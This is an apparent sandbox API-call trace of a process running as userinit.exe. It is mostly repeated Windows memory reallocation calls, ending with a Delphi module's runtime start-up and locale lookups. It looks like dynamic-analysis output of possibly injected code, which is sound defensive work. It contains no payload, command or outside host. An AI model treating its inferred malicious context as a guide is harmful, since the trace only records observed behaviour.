[0167.773] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.773] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.773] GlobalUnlock (hMem=0x128000c) returned 0
[0167.773] GlobalReAlloc (hMem=0x128000c, dwBytes=0x66000, uFlags=0x2) returned 0x128000c
[0167.773] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.774] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.774] GlobalUnlock (hMem=0x128000c) returned 0
[0167.774] GlobalReAlloc (hMem=0x128000c, dwBytes=0x68000, uFlags=0x2) returned 0x128000c
[0167.774] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.774] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.774] GlobalUnlock (hMem=0x128000c) returned 0
[0167.774] GlobalReAlloc (hMem=0x128000c, dwBytes=0x6a000, uFlags=0x2) returned 0x128000c
[0167.774] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.775] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.775] GlobalUnlock (hMem=0x128000c) returned 0
[0167.775] GlobalReAlloc (hMem=0x128000c, dwBytes=0x6c000, uFlags=0x2) returned 0x128000c
[0167.778] GlobalLock (hMem=0x128000c) returned 0x330820
[0167.779] GlobalHandle (pMem=0x330820) returned 0x128000c
[0167.779] GlobalUnlock (hMem=0x128000c) returned 0
[0167.779] GlobalReAlloc (hMem=0x128000c, dwBytes=0x6e000, uFlags=0x2) returned 0x128000c
[0167.779] GlobalLock (hMem=0x128000c) returned 0x330820
[0167.779] GlobalHandle (pMem=0x330820) returned 0x128000c
[0167.779] GlobalUnlock (hMem=0x128000c) returned 0
[0167.779] GlobalReAlloc (hMem=0x128000c, dwBytes=0x70000, uFlags=0x2) returned 0x128000c
[0167.791] GlobalLock (hMem=0x128000c) returned 0x2310048
[0167.792] GlobalHandle (pMem=0x2310048) returned 0x128000c
[0167.792] GlobalUnlock (hMem=0x128000c) returned 0
[0167.792] GlobalReAlloc (hMem=0x128000c, dwBytes=0x72000, uFlags=0x2) returned 0x128000c
[0167.796] GlobalLock (hMem=0x128000c) returned 0x2380058
[0167.796] GlobalHandle (pMem=0x2380058) returned 0x128000c
[0167.796] GlobalUnlock (hMem=0x128000c) returned 0
[0167.796] GlobalReAlloc (hMem=0x128000c, dwBytes=0x74000, uFlags=0x2) returned 0x128000c
[0167.796] GlobalLock (hMem=0x128000c) returned 0x2380058
[0167.797] GlobalHandle (pMem=0x2380058) returned 0x128000c
[0167.797] GlobalUnlock (hMem=0x128000c) returned 0
[0167.797] GlobalReAlloc (hMem=0x128000c, dwBytes=0x76000, uFlags=0x2) returned 0x128000c
[0167.809] GlobalLock (hMem=0x128000c) returned 0x2c6810
[0167.809] GlobalHandle (pMem=0x2c6810) returned 0x128000c
[0167.810] GlobalUnlock (hMem=0x128000c) returned 0
[0167.810] GlobalReAlloc (hMem=0x128000c, dwBytes=0x78000, uFlags=0x2) returned 0x128000c
[0167.814] GlobalLock (hMem=0x128000c) returned 0x2310048
[0167.815] GlobalHandle (pMem=0x2310048) returned 0x128000c
[0167.815] GlobalUnlock (hMem=0x128000c) returned 0
[0167.815] GlobalReAlloc (hMem=0x128000c, dwBytes=0x7a000, uFlags=0x2) returned 0x128000c
[0167.820] GlobalLock (hMem=0x128000c) returned 0x2388058
[0167.821] GlobalHandle (pMem=0x2388058) returned 0x128000c
[0167.821] GlobalUnlock (hMem=0x128000c) returned 0
[0167.821] GlobalReAlloc (hMem=0x128000c, dwBytes=0x7c000, uFlags=0x2) returned 0x128000c
[0167.821] GlobalLock (hMem=0x128000c) returned 0x2388058
[0167.822] GlobalHandle (pMem=0x2388058) returned 0x128000c
[0167.822] GlobalUnlock (hMem=0x128000c) returned 0
[0167.822] GlobalReAlloc (hMem=0x128000c, dwBytes=0x7e000, uFlags=0x2) returned 0x128000c
[0167.834] GlobalLock (hMem=0x128000c) returned 0x2410048
[0167.835] GlobalHandle (pMem=0x2410048) returned 0x128000c
[0167.835] GlobalUnlock (hMem=0x128000c) returned 0
[0167.835] GlobalReAlloc (hMem=0x128000c, dwBytes=0x80000, uFlags=0x2) returned 0x128000c
[0167.850] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.851] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.851] GlobalUnlock (hMem=0x128000c) returned 0
[0167.851] GlobalReAlloc (hMem=0x128000c, dwBytes=0x82000, uFlags=0x2) returned 0x128000c
[0167.859] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.860] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.860] GlobalUnlock (hMem=0x128000c) returned 0
[0167.860] GlobalReAlloc (hMem=0x128000c, dwBytes=0x84000, uFlags=0x2) returned 0x128000c
[0167.869] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.870] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.870] GlobalUnlock (hMem=0x128000c) returned 0
[0167.870] GlobalReAlloc (hMem=0x128000c, dwBytes=0x86000, uFlags=0x2) returned 0x128000c
[0167.879] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.880] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.880] GlobalUnlock (hMem=0x128000c) returned 0
[0167.880] GlobalReAlloc (hMem=0x128000c, dwBytes=0x88000, uFlags=0x2) returned 0x128000c
[0167.889] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.889] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.890] GlobalUnlock (hMem=0x128000c) returned 0
[0167.890] GlobalReAlloc (hMem=0x128000c, dwBytes=0x8a000, uFlags=0x2) returned 0x128000c
[0167.898] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.899] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.899] GlobalUnlock (hMem=0x128000c) returned 0
[0167.899] GlobalReAlloc (hMem=0x128000c, dwBytes=0x8c000, uFlags=0x2) returned 0x128000c
[0167.909] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.910] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.910] GlobalUnlock (hMem=0x128000c) returned 0
[0167.910] GlobalReAlloc (hMem=0x128000c, dwBytes=0x8e000, uFlags=0x2) returned 0x128000c
[0167.920] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.920] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.921] GlobalUnlock (hMem=0x128000c) returned 0
[0167.921] GlobalReAlloc (hMem=0x128000c, dwBytes=0x90000, uFlags=0x2) returned 0x128000c
[0167.930] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.931] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.931] GlobalUnlock (hMem=0x128000c) returned 0
[0167.931] GlobalReAlloc (hMem=0x128000c, dwBytes=0x92000, uFlags=0x2) returned 0x128000c
[0167.940] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.941] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.941] GlobalUnlock (hMem=0x128000c) returned 0
[0167.941] GlobalReAlloc (hMem=0x128000c, dwBytes=0x94000, uFlags=0x2) returned 0x128000c
[0167.951] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.951] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.952] GlobalUnlock (hMem=0x128000c) returned 0
[0167.952] GlobalReAlloc (hMem=0x128000c, dwBytes=0x96000, uFlags=0x2) returned 0x128000c
[0167.961] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.962] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.962] GlobalUnlock (hMem=0x128000c) returned 0
[0167.962] GlobalReAlloc (hMem=0x128000c, dwBytes=0x98000, uFlags=0x2) returned 0x128000c
[0167.972] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0167.972] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0167.972] GlobalUnlock (hMem=0x128000c) returned 0
[0167.972] GlobalReAlloc (hMem=0x128000c, dwBytes=0x9a000, uFlags=0x2) returned 0x128000c
[0167.982] GlobalLock (hMem=0x128000c) returned 0x2610020
[0167.983] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0167.983] GlobalUnlock (hMem=0x128000c) returned 0
[0167.983] GlobalReAlloc (hMem=0x128000c, dwBytes=0x9c000, uFlags=0x2) returned 0x128000c
[0168.001] GlobalLock (hMem=0x128000c) returned 0x13f0020
[0168.002] GlobalHandle (pMem=0x13f0020) returned 0x128000c
[0168.002] GlobalUnlock (hMem=0x128000c) returned 0
[0168.002] GlobalReAlloc (hMem=0x128000c, dwBytes=0x9e000, uFlags=0x2) returned 0x128000c
[0168.012] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.013] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.013] GlobalUnlock (hMem=0x128000c) returned 0
[0168.013] GlobalReAlloc (hMem=0x128000c, dwBytes=0xa0000, uFlags=0x2) returned 0x128000c
[0168.023] GlobalLock (hMem=0x128000c) returned 0x26b0020
[0168.024] GlobalHandle (pMem=0x26b0020) returned 0x128000c
[0168.024] GlobalUnlock (hMem=0x128000c) returned 0
[0168.024] GlobalReAlloc (hMem=0x128000c, dwBytes=0xa2000, uFlags=0x2) returned 0x128000c
[0168.035] GlobalLock (hMem=0x128000c) returned 0x2760020
[0168.036] GlobalHandle (pMem=0x2760020) returned 0x128000c
[0168.036] GlobalUnlock (hMem=0x128000c) returned 0
[0168.036] GlobalReAlloc (hMem=0x128000c, dwBytes=0xa4000, uFlags=0x2) returned 0x128000c
[0168.093] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.094] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.094] GlobalUnlock (hMem=0x128000c) returned 0
[0168.094] GlobalReAlloc (hMem=0x128000c, dwBytes=0xa6000, uFlags=0x2) returned 0x128000c
[0168.105] GlobalLock (hMem=0x128000c) returned 0x26c0020
[0168.106] GlobalHandle (pMem=0x26c0020) returned 0x128000c
[0168.106] GlobalUnlock (hMem=0x128000c) returned 0
[0168.106] GlobalReAlloc (hMem=0x128000c, dwBytes=0xa8000, uFlags=0x2) returned 0x128000c
[0168.117] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.118] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.118] GlobalUnlock (hMem=0x128000c) returned 0
[0168.118] GlobalReAlloc (hMem=0x128000c, dwBytes=0xaa000, uFlags=0x2) returned 0x128000c
[0168.128] GlobalLock (hMem=0x128000c) returned 0x26c0020
[0168.129] GlobalHandle (pMem=0x26c0020) returned 0x128000c
[0168.129] GlobalUnlock (hMem=0x128000c) returned 0
[0168.129] GlobalReAlloc (hMem=0x128000c, dwBytes=0xac000, uFlags=0x2) returned 0x128000c
[0168.195] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.196] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.196] GlobalUnlock (hMem=0x128000c) returned 0
[0168.196] GlobalReAlloc (hMem=0x128000c, dwBytes=0xae000, uFlags=0x2) returned 0x128000c
[0168.208] GlobalLock (hMem=0x128000c) returned 0x26c0020
[0168.208] GlobalHandle (pMem=0x26c0020) returned 0x128000c
[0168.208] GlobalUnlock (hMem=0x128000c) returned 0
[0168.208] GlobalReAlloc (hMem=0x128000c, dwBytes=0xb0000, uFlags=0x2) returned 0x128000c
[0168.220] GlobalLock (hMem=0x128000c) returned 0x2770020
[0168.221] GlobalHandle (pMem=0x2770020) returned 0x128000c
[0168.221] GlobalUnlock (hMem=0x128000c) returned 0
[0168.221] GlobalReAlloc (hMem=0x128000c, dwBytes=0xb2000, uFlags=0x2) returned 0x128000c
[0168.252] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.253] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.253] GlobalUnlock (hMem=0x128000c) returned 0
[0168.253] GlobalReAlloc (hMem=0x128000c, dwBytes=0xb4000, uFlags=0x2) returned 0x128000c
[0168.265] GlobalLock (hMem=0x128000c) returned 0x26d0020
[0168.266] GlobalHandle (pMem=0x26d0020) returned 0x128000c
[0168.266] GlobalUnlock (hMem=0x128000c) returned 0
[0168.266] GlobalReAlloc (hMem=0x128000c, dwBytes=0xb6000, uFlags=0x2) returned 0x128000c
[0168.280] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.281] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.281] GlobalUnlock (hMem=0x128000c) returned 0
[0168.281] GlobalReAlloc (hMem=0x128000c, dwBytes=0xb8000, uFlags=0x2) returned 0x128000c
[0168.341] GlobalLock (hMem=0x128000c) returned 0x26d0020
[0168.341] GlobalHandle (pMem=0x26d0020) returned 0x128000c
[0168.341] GlobalUnlock (hMem=0x128000c) returned 0
[0168.341] GlobalReAlloc (hMem=0x128000c, dwBytes=0xba000, uFlags=0x2) returned 0x128000c
[0168.354] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.355] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.355] GlobalUnlock (hMem=0x128000c) returned 0
[0168.355] GlobalReAlloc (hMem=0x128000c, dwBytes=0xbc000, uFlags=0x2) returned 0x128000c
[0168.367] GlobalLock (hMem=0x128000c) returned 0x26d0020
[0168.368] GlobalHandle (pMem=0x26d0020) returned 0x128000c
[0168.368] GlobalUnlock (hMem=0x128000c) returned 0
[0168.368] GlobalReAlloc (hMem=0x128000c, dwBytes=0xbe000, uFlags=0x2) returned 0x128000c
[0168.427] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.428] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.428] GlobalUnlock (hMem=0x128000c) returned 0
[0168.428] GlobalReAlloc (hMem=0x128000c, dwBytes=0xc0000, uFlags=0x2) returned 0x128000c
[0168.441] GlobalLock (hMem=0x128000c) returned 0x26d0020
[0168.442] GlobalHandle (pMem=0x26d0020) returned 0x128000c
[0168.442] GlobalUnlock (hMem=0x128000c) returned 0
[0168.442] GlobalReAlloc (hMem=0x128000c, dwBytes=0xc2000, uFlags=0x2) returned 0x128000c
[0168.456] GlobalLock (hMem=0x128000c) returned 0x27a0020
[0168.456] GlobalHandle (pMem=0x27a0020) returned 0x128000c
[0168.456] GlobalUnlock (hMem=0x128000c) returned 0
[0168.456] GlobalReAlloc (hMem=0x128000c, dwBytes=0xc4000, uFlags=0x2) returned 0x128000c
[0168.470] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.470] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.470] GlobalUnlock (hMem=0x128000c) returned 0
[0168.470] GlobalReAlloc (hMem=0x128000c, dwBytes=0xc6000, uFlags=0x2) returned 0x128000c
[0168.531] GlobalLock (hMem=0x128000c) returned 0x26e0020
[0168.532] GlobalHandle (pMem=0x26e0020) returned 0x128000c
[0168.532] GlobalUnlock (hMem=0x128000c) returned 0
[0168.532] GlobalReAlloc (hMem=0x128000c, dwBytes=0xc8000, uFlags=0x2) returned 0x128000c
[0168.545] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.546] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.546] GlobalUnlock (hMem=0x128000c) returned 0
[0168.546] GlobalReAlloc (hMem=0x128000c, dwBytes=0xca000, uFlags=0x2) returned 0x128000c
[0168.559] GlobalLock (hMem=0x128000c) returned 0x26e0020
[0168.560] GlobalHandle (pMem=0x26e0020) returned 0x128000c
[0168.560] GlobalUnlock (hMem=0x128000c) returned 0
[0168.560] GlobalReAlloc (hMem=0x128000c, dwBytes=0xcc000, uFlags=0x2) returned 0x128000c
[0168.621] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.622] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.622] GlobalUnlock (hMem=0x128000c) returned 0
[0168.622] GlobalReAlloc (hMem=0x128000c, dwBytes=0xce000, uFlags=0x2) returned 0x128000c
[0168.638] GlobalLock (hMem=0x128000c) returned 0x26e0020
[0168.639] GlobalHandle (pMem=0x26e0020) returned 0x128000c
[0168.639] GlobalUnlock (hMem=0x128000c) returned 0
[0168.639] GlobalReAlloc (hMem=0x128000c, dwBytes=0xd0000, uFlags=0x2) returned 0x128000c
[0168.654] GlobalLock (hMem=0x128000c) returned 0x27b0020
[0168.655] GlobalHandle (pMem=0x27b0020) returned 0x128000c
[0168.655] GlobalUnlock (hMem=0x128000c) returned 0
[0168.655] GlobalReAlloc (hMem=0x128000c, dwBytes=0xd2000, uFlags=0x2) returned 0x128000c
[0168.717] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.718] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.718] GlobalUnlock (hMem=0x128000c) returned 0
[0168.718] GlobalReAlloc (hMem=0x128000c, dwBytes=0xd4000, uFlags=0x2) returned 0x128000c
[0168.733] GlobalLock (hMem=0x128000c) returned 0x26f0020
[0168.734] GlobalHandle (pMem=0x26f0020) returned 0x128000c
[0168.734] GlobalUnlock (hMem=0x128000c) returned 0
[0168.734] GlobalReAlloc (hMem=0x128000c, dwBytes=0xd6000, uFlags=0x2) returned 0x128000c
[0168.748] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.749] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.749] GlobalUnlock (hMem=0x128000c) returned 0
[0168.749] GlobalReAlloc (hMem=0x128000c, dwBytes=0xd8000, uFlags=0x2) returned 0x128000c
[0168.810] GlobalLock (hMem=0x128000c) returned 0x26f0020
[0168.811] GlobalHandle (pMem=0x26f0020) returned 0x128000c
[0168.811] GlobalUnlock (hMem=0x128000c) returned 0
[0168.811] GlobalReAlloc (hMem=0x128000c, dwBytes=0xda000, uFlags=0x2) returned 0x128000c
[0168.825] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.825] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.825] GlobalUnlock (hMem=0x128000c) returned 0
[0168.825] GlobalReAlloc (hMem=0x128000c, dwBytes=0xdc000, uFlags=0x2) returned 0x128000c
[0168.840] GlobalLock (hMem=0x128000c) returned 0x26f0020
[0168.841] GlobalHandle (pMem=0x26f0020) returned 0x128000c
[0168.841] GlobalUnlock (hMem=0x128000c) returned 0
[0168.841] GlobalReAlloc (hMem=0x128000c, dwBytes=0xde000, uFlags=0x2) returned 0x128000c
[0168.918] GlobalLock (hMem=0x128000c) returned 0x2610020
[0168.919] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0168.919] GlobalUnlock (hMem=0x128000c) returned 0
[0168.919] GlobalReAlloc (hMem=0x128000c, dwBytes=0xe0000, uFlags=0x2) returned 0x128000c
[0168.934] GlobalLock (hMem=0x128000c) returned 0x26f0020
[0168.935] GlobalHandle (pMem=0x26f0020) returned 0x128000c
[0168.935] GlobalUnlock (hMem=0x128000c) returned 0
[0168.935] GlobalReAlloc (hMem=0x128000c, dwBytes=0xe2000, uFlags=0x2) returned 0x128000c
[0168.949] GlobalLock (hMem=0x128000c) returned 0x27e0020
[0168.950] GlobalHandle (pMem=0x27e0020) returned 0x128000c
[0168.950] GlobalUnlock (hMem=0x128000c) returned 0
[0168.950] GlobalReAlloc (hMem=0x128000c, dwBytes=0xe4000, uFlags=0x2) returned 0x128000c
[0169.014] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.015] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.015] GlobalUnlock (hMem=0x128000c) returned 0
[0169.015] GlobalReAlloc (hMem=0x128000c, dwBytes=0xe6000, uFlags=0x2) returned 0x128000c
[0169.034] GlobalLock (hMem=0x128000c) returned 0x2700020
[0169.035] GlobalHandle (pMem=0x2700020) returned 0x128000c
[0169.035] GlobalUnlock (hMem=0x128000c) returned 0
[0169.035] GlobalReAlloc (hMem=0x128000c, dwBytes=0xe8000, uFlags=0x2) returned 0x128000c
[0169.100] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.101] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.101] GlobalUnlock (hMem=0x128000c) returned 0
[0169.101] GlobalReAlloc (hMem=0x128000c, dwBytes=0xea000, uFlags=0x2) returned 0x128000c
[0169.117] GlobalLock (hMem=0x128000c) returned 0x2700020
[0169.118] GlobalHandle (pMem=0x2700020) returned 0x128000c
[0169.118] GlobalUnlock (hMem=0x128000c) returned 0
[0169.118] GlobalReAlloc (hMem=0x128000c, dwBytes=0xec000, uFlags=0x2) returned 0x128000c
[0169.134] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.135] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.135] GlobalUnlock (hMem=0x128000c) returned 0
[0169.135] GlobalReAlloc (hMem=0x128000c, dwBytes=0xee000, uFlags=0x2) returned 0x128000c
[0169.198] GlobalLock (hMem=0x128000c) returned 0x2700020
[0169.199] GlobalHandle (pMem=0x2700020) returned 0x128000c
[0169.199] GlobalUnlock (hMem=0x128000c) returned 0
[0169.199] GlobalReAlloc (hMem=0x128000c, dwBytes=0xf0000, uFlags=0x2) returned 0x128000c
[0169.216] GlobalLock (hMem=0x128000c) returned 0x27f0020
[0169.217] GlobalHandle (pMem=0x27f0020) returned 0x128000c
[0169.217] GlobalUnlock (hMem=0x128000c) returned 0
[0169.217] GlobalReAlloc (hMem=0x128000c, dwBytes=0xf2000, uFlags=0x2) returned 0x128000c
[0169.235] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.236] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.236] GlobalUnlock (hMem=0x128000c) returned 0
[0169.236] GlobalReAlloc (hMem=0x128000c, dwBytes=0xf4000, uFlags=0x2) returned 0x128000c
[0169.301] GlobalLock (hMem=0x128000c) returned 0x2710020
[0169.302] GlobalHandle (pMem=0x2710020) returned 0x128000c
[0169.302] GlobalUnlock (hMem=0x128000c) returned 0
[0169.303] GlobalReAlloc (hMem=0x128000c, dwBytes=0xf6000, uFlags=0x2) returned 0x128000c
[0169.319] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.320] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.320] GlobalUnlock (hMem=0x128000c) returned 0
[0169.320] GlobalReAlloc (hMem=0x128000c, dwBytes=0xf8000, uFlags=0x2) returned 0x128000c
[0169.384] GlobalLock (hMem=0x128000c) returned 0x2710020
[0169.385] GlobalHandle (pMem=0x2710020) returned 0x128000c
[0169.385] GlobalUnlock (hMem=0x128000c) returned 0
[0169.385] GlobalReAlloc (hMem=0x128000c, dwBytes=0xfa000, uFlags=0x2) returned 0x128000c
[0169.401] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.402] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.402] GlobalUnlock (hMem=0x128000c) returned 0
[0169.402] GlobalReAlloc (hMem=0x128000c, dwBytes=0xfc000, uFlags=0x2) returned 0x128000c
[0169.420] GlobalLock (hMem=0x128000c) returned 0x2710020
[0169.421] GlobalHandle (pMem=0x2710020) returned 0x128000c
[0169.421] GlobalUnlock (hMem=0x128000c) returned 0
[0169.421] GlobalReAlloc (hMem=0x128000c, dwBytes=0xfe000, uFlags=0x2) returned 0x128000c
[0169.485] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.486] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.486] GlobalUnlock (hMem=0x128000c) returned 0
[0169.486] GlobalReAlloc (hMem=0x128000c, dwBytes=0x100000, uFlags=0x2) returned 0x128000c
[0169.514] GlobalLock (hMem=0x128000c) returned 0x2710020
[0169.515] GlobalHandle (pMem=0x2710020) returned 0x128000c
[0169.515] GlobalUnlock (hMem=0x128000c) returned 0
[0169.515] GlobalReAlloc (hMem=0x128000c, dwBytes=0x102000, uFlags=0x2) returned 0x128000c
[0169.583] GlobalLock (hMem=0x128000c) returned 0x2820020
[0169.584] GlobalHandle (pMem=0x2820020) returned 0x128000c
[0169.584] GlobalUnlock (hMem=0x128000c) returned 0
[0169.584] GlobalReAlloc (hMem=0x128000c, dwBytes=0x104000, uFlags=0x2) returned 0x128000c
[0169.606] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.607] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.607] GlobalUnlock (hMem=0x128000c) returned 0
[0169.607] GlobalReAlloc (hMem=0x128000c, dwBytes=0x106000, uFlags=0x2) returned 0x128000c
[0169.675] GlobalLock (hMem=0x128000c) returned 0x2720020
[0169.676] GlobalHandle (pMem=0x2720020) returned 0x128000c
[0169.676] GlobalUnlock (hMem=0x128000c) returned 0
[0169.676] GlobalReAlloc (hMem=0x128000c, dwBytes=0x108000, uFlags=0x2) returned 0x128000c
[0169.698] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.699] GlobalHandle (pMem=0x2610020) returned 0x128000c
[0169.699] GlobalUnlock (hMem=0x128000c) returned 0
[0169.699] GlobalReAlloc (hMem=0x128000c, dwBytes=0x10a000, uFlags=0x2) returned 0x128000c
[0169.765] GlobalLock (hMem=0x128000c) returned 0x2720020
[0169.766] GlobalHandle (pMem=0x2720020) returned 0x128000c
[0169.766] GlobalUnlock (hMem=0x128000c) returned 0
[0169.766] GlobalReAlloc (hMem=0x128000c, dwBytes=0x10c000, uFlags=0x2) returned 0x128000c
[0169.785] GlobalLock (hMem=0x128000c) returned 0x2610020
[0169.786] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2720000
[0169.786] VirtualAlloc (lpAddress=0x2720000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2720000
[0169.869] GetKeyboardType (nTypeFlag=0) returned 4
[0169.869] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0169.869] GetStartupInfoA (in: lpStartupInfo=0x1af860 | out: lpStartupInfo=0x1af860*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0169.869] GetVersion () returned 0x1db10106
[0169.869] GetVersion () returned 0x1db10106
[0169.869] GetCurrentThreadId () returned 0x84c
[0169.869] GetModuleFileNameA (in: hModule=0x2830000, lpFilename=0x1af35c, nSize=0x105 | out: lpFilename="ló\x1a" (normalized: "c:\\windows\\system32\\ló\x1a")) returned 0x0
[0169.869] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af237, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0169.869] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af34c | out: phkResult=0x1af34c*=0x0) returned 0x2
[0169.869] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af34c | out: phkResult=0x1af34c*=0x0) returned 0x2
[0169.869] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1af34c | out: phkResult=0x1af34c*=0x0) returned 0x2
[0169.869] lstrcpynA (in: lpString1=0x1af237, lpString2="ló\x1a", iMaxLength=261 | out: lpString1="ló\x1a") returned="ló\x1a"
[0169.870] GetThreadLocale () returned 0x409
[0169.870] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1af347, cchData=5 | out: lpLCData="ENU") returned 4
[0169.870] lstrlenA (lpString="ló\x1a") returned 3
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffc4, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0169.870] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2cdcc0
[0169.870] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2950000
[0169.870] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2cecc0
[0169.870] VirtualAlloc (lpAddress=0x2950000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2950000
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffc3, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffc1, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffc2, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffd4, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffdd, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffd3, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffd0, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
